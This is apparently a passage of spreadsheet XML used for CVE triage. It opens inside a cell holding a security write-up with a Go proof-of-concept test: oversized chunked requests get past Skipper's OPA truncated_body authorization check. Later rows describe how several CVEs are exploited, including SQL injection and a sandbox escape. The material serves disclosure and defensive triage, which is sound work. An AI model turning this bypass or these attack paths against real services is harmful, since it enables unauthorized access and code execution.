- *"Truncated JSON just fails to parse → fail closed."* True for `application/json` when truncation lands mid-token, but the bypass does not rely on JSON: `application/x-www-form-urlencoded` parses leniently after truncation, and unparsed/absent content-types return `(nil, false, nil)` with no error. The load-bearing signal is `truncated_body`, not `parsed_body`, and it is `false` in all these cases.
- *"Maybe Skipper adds a content-length for chunked before OPA sees it."* No — `AdaptToExtAuthRequest` copies `req.Header` verbatim (lowercased); a chunked request has no `content-length` header, and net/http does not synthesise one. Confirmed by reading `skipperadapter.go`.
- *"Maybe the mitigation is `deny if truncated_body == true` (allow-by-default), which is unaffected."* Both shapes in the advisory rely on `truncated_body` correctly reflecting truncation; the deny-if shape simply *fails to deny* under the same chunked condition. The allow-if shape (shown) fails open directly.
- *"Is this already covered by CVE-2026-50197?"* No. 50197 was the *empty-body* chunked bypass (OPA saw no body); its fix makes OPA see the truncated prefix. GHSA-8qqm was the declared-Content-Length oversized variant; its fix populates `parsed_body` and recommends `truncated_body`. Neither addresses `truncated_body` being unset for chunked/HTTP-2 oversized bodies. The 8qqm positive-control test only used small chunked bodies.
Result: survives refutation; concrete, reproducible bypass of the published mitigation. Differentiation check passes (incomplete-fix of a published advisory, not a generic surface bug).
## Remediation
Do not rely on the client-supplied `content-length` header to detect truncation. Skipper should signal truncation authoritatively to OPA rather than delegating to the plugin's Content-Length heuristic. Concretely, in `ExtractHttpBodyOptionally`, detect that the underlying body still has bytes after `maxBodyBytes` were buffered (e.g. attempt one more read / peek) and propagate a definitive truncation indicator — for example by setting a synthetic `content-length` (or a dedicated context extension / metadata field) that reflects the real truncation state, so `input.truncated_body` is `true` whenever the body was actually cut, regardless of transfer encoding. Alternatively, reject (413) requests whose body exceeds `maxBodyBytes` when body-based authorization is enabled, instead of silently truncating. Upstream, `opa-envoy-plugin` should treat "body present but not fully inspectable and no content-length" as truncated rather than defaulting to `false`.
## Confidence
High. Root cause verified in both Skipper and the pinned `opa-envoy-plugin@v1.14.1-envoy` source; executable PoC demonstrates the status/upstream-body divergence against the maintainer's own recommended mitigation.
## Proof-of-Concept source (`poc_truncated_body_chunked_test.go`)
```go
package openpolicyagent_test
import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync/atomic"
	"testing"
	"time"
	opasdktest "github.com/open-policy-agent/opa/v1/sdk/test"
	"github.com/stretchr/testify/assert"
	"github.com/zalando/skipper/eskip"
	"github.com/zalando/skipper/filters"
	"github.com/zalando/skipper/filters/builtin"
	"github.com/zalando/skipper/filters/openpolicyagent"
	"github.com/zalando/skipper/filters/openpolicyagent/opaauthorizerequest"
	"github.com/zalando/skipper/proxy"
	"github.com/zalando/skipper/routing"
	"github.com/zalando/skipper/routing/testdataclient"
)
// TestTruncatedBodyChunkedBypass demonstrates that the GHSA-8qqm-fp2q-v734
// mitigation ("check input.truncated_body in your policy") fails OPEN when the
// oversized request is sent with Transfer-Encoding: chunked (no Content-Length).
//
// The mitigation Rego (verbatim from the advisory):
//
//	default allow := false
//	allow if { input.truncated_body == false }
//
// truncated_body is derived by the OPA envoy plugin ONLY when a content-length
// header is present (opa-envoy-plugin envoyauth/request.go getParsedBody -&gt;
// checkIfHTTPBodyTruncated). A chunked / HTTP-2 request carries no
// content-length, so truncated_body stays false even though Skipper truncated
// the body to max-request-body-size. The mitigated policy therefore ALLOWS an
// oversized body and the full payload reaches upstream.
func TestTruncatedBodyChunkedBypass(t *testing.T) {
	const maxBody = 32
	// oversized url-encoded payload: "a=" + 64 * "A" = 66 bytes &gt; 32.
	payload := "a=" + strings.Repeat("A", 64)
	// upstream records how many body bytes it actually received.
	var upstreamBytes atomic.Int64
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		n, _ := io.Copy(io.Discard, r.Body)
		upstreamBytes.Store(n)
		w.WriteHeader(200)
		w.Write([]byte("OK"))
	}))
	defer backend.Close()
	bundleName := "test-bundle"
	opaControlPlane := opasdktest.MustNewServer(
		opasdktest.MockBundle("/bundles/"+bundleName, map[string]string{
			// The exact mitigation the advisory recommends.
			"main.rego": `
package envoy.authz
import rego.v1
default allow := false
allow if {
    input.truncated_body == false
}
`,
		}),
	)
	defer opaControlPlane.Stop()
	config := fmt.Appendf(nil, `{
		"services": {"test": {"url": %q}},
		"bundles": {"test": {"resource": "/bundles/{{ .bundlename }}"}},
		"labels": {"environment": "test"},
		"plugins": {"envoy_ext_authz_grpc": {"path": "envoy/authz/allow", "dry-run": false}}
	}`, opaControlPlane.URL())
	opaRegistry, err := openpolicyagent.NewOpenPolicyAgentRegistry(
		openpolicyagent.WithPreloadingEnabled(true),
		openpolicyagent.WithEnableDataPreProcessingOptimization(true),
		openpolicyagent.WithInstanceStartupTimeout(5*time.Second),
		openpolicyagent.WithMaxRequestBodyBytes(maxBody),
		openpolicyagent.WithOpenPolicyAgentInstanceConfig(
			openpolicyagent.WithConfigTemplate(config)),
	)
	if err != nil {
		t.Fatalf("opaRegistry: %v", err)
	}
	defer opaRegistry.Close()
	fr := make(filters.Registry)
	fr.Register(opaauthorizerequest.NewOpaAuthorizeRequestWithBodySpec(opaRegistry))
	fr.Register(builtin.NewSetPath())
	docFmt := `r1: * -&gt; opaAuthorizeRequestWithBody("%s") -&gt; "%s";`
	r := eskip.MustParse(fmt.Sprintf(docFmt, bundleName, backend.URL))
	dc := testdataclient.New(r)
	defer dc.Close()
	rt := routing.New(routing.Options{
		FilterRegistry:  fr,
		DataClients:     []routing.DataClient{dc},
		PreProcessors:   []routing.PreProcessor{opaRegistry.NewPreProcessor()},
		PostProcessors:  []routing.PostProcessor{opaRegistry},
		PollTimeout:     time.Second,
		SignalFirstLoad: true,
	})
	defer rt.Close()
	&lt;-rt.FirstLoad()
	pr := proxy.WithParams(proxy.Params{Routing: rt})
	defer pr.Close()
	ts := httptest.NewServer(pr)
	defer ts.Close()
	inst, err := opaRegistry.GetOrStartInstance(bundleName)
	assert.NoError(t, err)
	assert.NotNil(t, inst)
	doReq := func(chunked bool) (int, int64) {
		upstreamBytes.Store(-1)
		req, err := http.NewRequest("POST", ts.URL, strings.NewReader(payload))
		if err != nil {
			t.Fatalf("new request: %v", err)
		}
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		if chunked {
			// Force chunked framing: no Content-Length reaches the server,
			// so the server sees req.ContentLength == -1.
			req.ContentLength = -1
			req.TransferEncoding = []string{"chunked"}
		}
		rsp, err := ts.Client().Do(req)
		if err != nil {
			t.Fatalf("do: %v", err)
		}
		io.Copy(io.Discard, rsp.Body)
		rsp.Body.Close()
		return rsp.StatusCode, upstreamBytes.Load()
	}
	// POSITIVE CONTROL: oversized body WITH Content-Length.
	// truncated_body == true  -&gt; policy denies. Mitigation works as designed.
	clStatus, clUpstream := doReq(false)
	t.Logf("[content-length ] status=%d upstream_body_bytes=%d", clStatus, clUpstream)
	assert.Equal(t, 403, clStatus, "oversized body with Content-Length must be DENIED (mitigation working)")
	// BYPASS: identical oversized body sent CHUNKED (no Content-Length).
	// truncated_body == false -&gt; policy ALLOWS -&gt; full payload reaches upstream.
	chStatus, chUpstream := doReq(true)
	t.Logf("[chunked        ] status=%d upstream_body_bytes=%d", chStatus, chUpstream)
	assert.Equal(t, 200, chStatus, "BYPASS: oversized chunked body was ALLOWED by the truncated_body mitigation")
	assert.Equal(t, int64(len(payload)), chUpstream,
		"BYPASS: upstream received the FULL oversized payload past OPA authorization")
}
```</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T265"/>
  <conditionalFormatting sqref="E2:E26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6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CVE-2026-92939</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-114</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>vm2 3.11.3 through 3.11.6 exposes the host Node.js crypto module to a NodeVM sandbox when the crypto builtin is allowed. The module is presented via a recursive read-only proxy, but its callable exports still execute with host-process authority. Sandboxed JavaScript can therefore call crypto.setEngine() with a filesystem path to an attacker-supplied native library (for example, one bundled in an untrusted plugin package already written to disk); OpenSSL asks the operating-system dynamic loader to load the file, and the library's constructor executes native code in the host process before engine-symbol validation rejects it. Exploitation requires only the crypto builtin and does not require fs, process, module, child_process, worker_threads, vm, or inspector access, resulting in a sandbox escape and arbitrary native code execution. Fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92939</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93393</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow exists in the TLS transport layer of the MongoDB C Driver when built with the Windows platform TLS backend. A remote endpoint that the client connects to, or an attacker able to impersonate or redirect the client's connection, can cause the driver to write attacker-supplied data outside the bounds of a heap allocation while processing incoming encrypted traffic. No authentication or user interaction is required, because the affected processing occurs before any application-level authentication completes. Successful exploitation may lead to memory corruption in the client process, disclosure of adjacent heap memory, or termination of the process.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93393</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54597</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>ITFlow provides an IT documentation, ticketing and accounting system for small managed service providers. Prior to version 26.07, an authenticated user with module_support write permission and access to a credential record can perform time-based blind SQL injection through the expires parameter of the share_generate_link handler in agent/ajax.php. sanitizeInput applies string-context escaping, but expires is inserted unquoted into the item_expire_at MySQL INTERVAL expression, allowing a crafted expression and interval unit to execute conditional database queries whose results are inferred from response delays. This can expose password hashes, SMTP credentials, API keys, encrypted vault data, and database metadata and support administrative takeover after credential cracking. This issue is fixed in version 26.07.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54597</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54354</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>MapServer is a system for developing web-based GIS applications. Prior to 8.6.4, MapServer's PostGIS runtime filter translation in src/mappostgis.cpp and msPostGISLayerTranslateFilter() treats a filteritem as numeric when CONNECTIONTYPE POSTGIS and metadata such as gml_&lt;item&gt;_type=Integer are configured, but it does not verify that attacker-controlled CGI qstring or OGC API Features featureId input is a numeric literal. The unquoted input is concatenated into the generated PostgreSQL/PostGIS predicate, allowing an unauthenticated remote attacker with access to an affected query endpoint to bypass predicates, enumerate unintended records, perform boolean-based or time-based SQL injection, and increase database load. The issue does not by itself establish database modification capabilities. This issue is fixed in version 8.6.4.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54354</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87935</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>The Paid Downloads plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 3.15 via the admin_request_handler function. This is due to missing authorization and file type validation in the admin_request_handler function, which is reachable unauthenticated via is_admin() returning true for /wp-admin/admin-post.php. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible. On Apache servers where AllowOverride is enabled, an .htaccess file placed in the upload directory may block direct HTTP retrieval of uploaded files, limiting exploitability to stacks that do not honor .htaccess directives such as nginx, LiteSpeed, and Apache with AllowOverride None.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87935</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53557</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, an authenticated user can supply a crafted sheet["tableName"] value in the Excel datasource configuration submitted through POST /api/v1/datasource/, and SQLBot stores that value without safe identifier handling. When the same datasource is later removed through DELETE /api/v1/datasource/{id}, the stored value is interpolated into datasource cleanup SQL and executed by PostgreSQL. This second-order SQL injection can invoke PostgreSQL COPY TO PROGRAM and execute arbitrary operating-system commands with the privileges of the postgres process inside the SQLBot container. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53557</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45726</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-732</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. From 1.3.0 until 1.6.6 and 1.7.3, importing a standalone Talos cluster creates an ImportedClusterSecrets resource containing the cluster's complete CA secrets bundle. The access rules in internal/backend/runtime/omni/state_access.go allow an authenticated user with the Reader role to retrieve the resource through ResourceService if the importing actor has not rotated those secrets, exposing Kubernetes, Talos, and etcd CA private keys plus the service-account key. The Kubernetes CA private key permits certificate signing for privileged identities such as system:masters and provides control of the imported cluster outside Omni's authorization boundary, including its workloads, credentials, and secrets. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45726</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50125</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>MKP is a Model Context Protocol server for Kubernetes. Prior to 0.4.1, cmd/server/main.go exposes the default HTTP endpoint and pkg/mcp/server.go registers the unauthenticated get_resource tool, which accepts attacker-controlled limitBytes and tailLines values for the pods logs subresource. buildPodLogOpts() in pkg/k8s/subresource.go parses those values as unbounded int64 parameters, and defaultGetPodLogs() copies the returned Kubernetes log stream through io.Copy into an in-memory bytes.Buffer without an application-side cap. A remote attacker who can reach the default port 8080 MCP endpoint and select a pod with sufficiently large accumulated logs can send one tools/call request that causes large allocations and additional response copies, while the request-frequency limiter does not constrain per-request volume. This can exhaust process memory, terminate the MKP server, and deny the MCP service; observed testing showed more than one GiB of RSS growth while handling a 128 MiB requested stream. This issue is fixed in version 0.4.1.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50125</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93435</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>redis-parser through 3.0.0 contains a denial of service vulnerability in the RESP protocol parser that allows malicious Redis endpoints to crash the client process through unbounded recursion on nested arrays. Attackers can send crafted RESP byte streams with repeated array headers that exhaust the V8 call stack, causing an uncaught RangeError that terminates the Node.js process without triggering error handling callbacks.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93435</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90997</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>mysql, keycloak</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Keycloak. When deployed in stateless mode with MySQL or MariaDB, a mismatch in row-count semantics between the database driver and Keycloak's application logic allows an attacker to bypass replay protection. This vulnerability enables an attacker who intercepts single-use security artifacts, such as JWT client assertions, DPoP proofs, or one-time password (TOTP) codes, to replay them. Successful exploitation grants unauthorized access to the token endpoint or login flow.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90997</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52727</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
